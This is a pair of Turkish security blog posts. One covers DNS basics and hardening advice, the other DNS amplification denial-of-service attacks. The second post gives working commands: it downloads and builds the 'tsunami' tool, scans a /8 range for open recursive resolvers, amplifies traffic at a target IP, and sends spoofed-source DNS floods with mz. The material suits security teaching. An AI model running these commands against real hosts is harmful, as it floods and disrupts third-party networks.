DNS nedir?

DNS(Domain Name System), internete bağlanmamızı sağlayan servislerden biri. Bugünlerde hepimiz interneti kullanıyoruz. İnternet, kullanıcısının gözünde milyonlarca internet sitesi, milyarlarca diğer kullanıcı ve sayısız resim, video, yazı ve benzeri demektir. Biz bir kullanıcı olarak internete bağlanmak istediğimizde girmek istediğimiz internet sitesini yazar “Enter” a basar ve internette sörf yaparız. Biz bunu yaparken internete bağlanmamızı sağlayan birçok servis kendi aralarında farklı bir dille anlaşır. Onların dili en basit haliyle 0(sıfır) ve 1(bir)lerden oluşur ve DNS servisi de tam olarak insan ve diğer internet servisleri arasında bir tercüman görevi görür. Mesela ben internet tarayıcımı açıp ve bağlanmak için http://canyoupwm.me yazdığımda kullandığım DNS servisi bu adresi 0 ve 1lerden oluşan dile çevirir ve beni bu şekilde internete bağlar.  Yukarıda DNS’in ne olduğunu ve ne iş yaptığını kabaca tanımlamış olduk.Şimdi de gelin DNS servisimizi nasıl daha güvenli hale getirebilirize bakalım.

Olası Tehditler

DNS servis tehditleri temelde iki gruba ayırılabilir. Söz konusu hackerimiz DNS hizmetinin nasıl çalıştığı üzerinden ilerleyip, biz internete bağlanırken DNS ve diğer hizmetler arasındaki trafiği manipüle ederek sistemimize sızabilir ki bu en çok karşılaşılan DNS sızma şeklidir. Bu yönteme örnek verecek olursak; varsayalım biz bağlanmak istediğimiz internet sitesini girdik ve işi DNS’e bıraktık. DNS yazdığımız internet adresini bize getirmek için diğer hizmetlerle iletişim kurarken hacker DNS hizmetimizi yanlış yönlendirip bizi kendi istediği bir sayfaya veya direk kendi istediği bir dosyaya yönlendirip sistemimize sızabilir. Diğer sızma yöntemleri ise kullanılan bazı DNS servis yazılımlarının(BIND vb.) açıklarıyla saldırmak ve DoS (denial-of-service) saldırısı ile sistemimizi meşgul etmek veya çökertmek daha sonra sızmaya çalışmaktır.DNS Hizmeti Saldırılarına Alınabilecek Önlemler DNS hizmeti konusunda alınabilecek önlemler kullanıcının profiline göre değişiklik gösteriyor. Ortalama bir PC kullanıcısı, bir server(sunucu) yöneticisi, kendi DNS sunucusuna sahip bir kullanıcı için gereken önlemler farklı seviyelerde olmak zorunda. Gelin alabileceğimiz örneklere genelden özele doğru bir bakalım.

Adres Çubuğu Kontrolü

En genel ve en kolay uygulanabilir yöntem olarak internete bağlanırken tarayıcımızın adres çubuğunda yazan internet adresinin tamamıyla doğru olduğuna dikkat etmeliyiz. Kullandığımız harflerin ve rakamların birbirine benzerliğini kullanarak bizi dolandırmak isteyen insanlar kullandığımız internet sitelerinin benzerlerini yapıp bizi kandırabilir. Bu yöntem uygulaması ve önlem alması bakımından diğerlerine göre nispeten basittir. Örnek verecek olursak;

Yukarıda adres çubuğunda yazan paypal’ın orijinal internet adresidir ve paypal kullanacağımız zaman bu adrese girmemiz gerekir.

Bu görselde gördüğümüz ise “1” ve “l” karakterlerinin benzerliği kullanılarak paypal kullanıcılarını dolandırmak amacıyla açılmış sahte bir internet adresidir.İkinci görseldeki internet sitesine girmemek ve dolandırılmamak için yapmamız gereken şey interneti kullanırken adres çubuğumuzda yazan internet adresiyle, gerçekte girmek istediğimiz internet adresinin aynı olduğunu kontrol etmek. Bu kadar basit ve basit olmasına karşın bu şekilde dolandırılan insanlar var. Bu yüzden basit olsa da göz ardı edilmemesi gereken bir önlem.

BIND(Berkeley Internet Name Domain) Kullanmak

BIND 1980’lerin başında Berkeley Üniversitesi kaynaklı tasarlanmış açık kaynaklı ve şuanda en çok kullanılan DNS servis yazılımıdır. BIND sayesinde geçen yıllarda DNS üzerinden gerçekleşen birçok tehdit engellendi ve bugün de BIND yoluna açık kaynaklı haliyle DNS tehditlerini engellemek için devam ediyor. BIND kullanmak sizi %100 güvenli yapmaz ama eski DNS açıklarını kapatmış olursunuz ve BIND yazılımını güncel olarak kullanırsanız da en son kapatılan açıklardan da etkilenmezsiniz. Aşağıdaki linklerden İngilizce olarak BIND hakkında resmi bir açıklama ve Windows için indirme linkini bulabilirsiniz.

https://www.isc.org/downloads/bind/
https://www.isc.org/downloads/

Birden Fazla DNS Servisinin Yönetimi

Eğer ihtiyaç gereği birden fazla DNS servisi kullanıyorsanız tedbir olarak, bu servisleri aynı subnet(alt ağ) üzerinden ve hatta aynı router ya da aynı özel hat üzerinden kullanmayın. Bunları farklı kullanmak size esneklik sağlar ve en azından bir DNS servisinize sızılsa bile diğer DNS servisleriniz güvende kalmaya devam edecektir.

TR | DNS Servis Sıkılaştırma CypmUni İYTE

DNS Nedir?

İnternet ağını oluşturan her birim sadece kendine ait bir IP adresine sahiptir. Bu IP adresleri kullanıcıların kullanımı için www.site_ismi.com gibi kolay hatırlanır adreslere karşılık düşürülür. DNS sunucuları, internet adreslerinin IP adresi karşılığını kayıtlı tutmaktadır.

Örn: 216.58.209.174 yerine google.com domain adresini yazmak gibi

DNS, UDP temelli basit bir protokolddür. Dns dendiğinde akla DNS istediği ve DNS cevabı gelmektedir. Bir DNS istek paketin 40-60 Byte civarındadır(alt protokol dahil). DNS cevabı değişir alan adı durumlarına göre ve 512 Byte’dan küçük olmalıdır. Eğer 512 Byte’dan büyük ise TCP üzerinden dönüş yapmak ister.

DNS Güvenlik Zafiyetleri

Dns çok önemli bir protokol olduğundan hem güvenlik uzmanlarının hemde hackerlar tarafından sık sık kurcalanmaktadır ve güvenlik zafiyetleri yayınlanır. Genel olarak bu zafiyetleri 3 şekilde gruplandırılabilir.

• DNS sunucusunun çalışmasını durdurabilecek zafiyetler
• DNS sunucusunun güvenliğini sıkıntıya sokacak zafiyetler
• DNS sunucuyu kullanan kullanıcının güvenliğini sıkıntıya sokabilecek zafiyetler

Amplified DNS Dos Saldırısı

Bu saldırı türü DNS sunucusunun çalışmasını durdurabilecek bir saldırı çeşitidir. Saldırının temel mantığı şudur: Bir DNS isteğine dönecek cevabın kat kat fazla olmasıdır. Sisteme gönderilecek 50 byte’lık bir DNS istediğine 500 Byte~ cevap döndüğü düşünülürse saldırgan elindeki bant genişliğinin 10 katı kadar saldırı trafiği oluşturabilir.

• Saldırgan Botnet ağına rekursif sorguya açık bir DNS sunucusu bulur ve daha önce hazırladığı özel alan adını sorgulattırır.
• Ara DNS sunucu kendi ön belliğinde olmayan isteği gidip ana DNS sunucuya sorar.
• Ana DNS bizi site isim boşluğuna yönlendirir ve ara DNS sunucu cevabı ön belleğine alarak bir kopyasını saldırgana döner. Buradaki amaç ara DNS sucununun dönen 500 Byte’lık cevabı ön belliğine almasını sağlamaktır.
• Saldırgan Kurban’ın IP adresindn geliyormuş gibi sahte DNS paketleri gönderir. DNS paketleri gönderir. DNS paketlerin host’u sorgulamaktadır. Ara DNS sunucu gelen her paket için 500 byte’lık cevabı kurban sistemlere dönmeye çalışacaktır. Böylelikle bant genişliğini azaltacaktır.

Tsunami Tool ile Saldırı

Saldırıyı tsunami adında bir uygulama ile gerçekleştirebiliriz. Bu adresten edinebilirsiniz.

http://www.infosec-ninjas.com/files/tsunami-0.0.9.tar.gz

Uygulama kurulumu:

wget http://www.infosec-ninjas.com/files/tsunami-0.0.9.tar.gz

apt-get install dh-autoreconf libpcap-dev nload

cd tsunami-0.0.9/

./configure

Make

Örnek saldırı:

[attack] ./tsunami -s 192.168.20.103 -n google.com -p 1 -f recursive_dns.txt

[scan] ./tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8

-s : Hedef IP Adres

-i : Kullanılacak Interface

-n : optional domain name . Default olarak geçerli hostname

-p : Her Dns server a gönderilecek paket sayısı.  Default  1

-f : Saldırı için recursive dns servers dosyasını aç

-o : Taranmış olan ip adreslerini dosyaya yaz.

-q : Query type. Default 1

-c : Query class. Default 1

-r : Rasgele recursive dns server listesi kullanma

-h : sadece EDNS0 kayıt eder.

-e : EDNS0 kayıt etme

-t : Zaman Aşımı. Default 3 saniye

MZ Tool ile Saldır

Uygulama kurulumu:

sudo apt-get install mz

ile uygulama kurulumu gerçekleştirilebilir.

Örnek Kullanımı:

# mz -A 5.5.5.5 -B 1.2.39.40 -t dns “q=google.com” -c 1000

• Burada kaynak ip 5.5.5.5 gibi gösterip 1.2.39.40 a 1000 paket gönderdik. mz bize rastgele dns sorguları üretme yeneteği sağlanmaktadır.

TR | DNS Amplification Attack CanYouPwnMe